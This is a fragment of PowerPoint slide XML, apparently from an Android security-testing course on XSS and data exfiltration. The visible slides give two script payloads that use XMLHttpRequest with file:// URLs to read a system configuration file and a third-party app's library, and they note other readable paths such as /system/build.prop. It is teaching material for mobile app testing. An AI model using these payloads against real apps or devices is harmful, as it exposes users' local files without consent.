              <a:t>installed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> on the phone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>:</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916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Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;a=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"GET"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"file:///system/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>custom.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="78A960"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() ;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"GET"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"file:///data/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>com.mwr.dz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>libmstring.so"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="78A960"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>NOTE: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>may</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>interesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> phone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>paths</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> as /system/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>build.prop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>depending</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>above</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a system file (/system/..) as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> as a file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>third</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> party app, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> has permissions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> apps to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> (/data/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>com.mwr.dz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>above</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>:</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018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EF51C2-C29D-E27E-4DAA-78B3B43A3151}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1107440" y="1230833"/>
            <a:ext cx="7122894" cy="5073348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1296460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XSS &amp; Data Exfiltration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
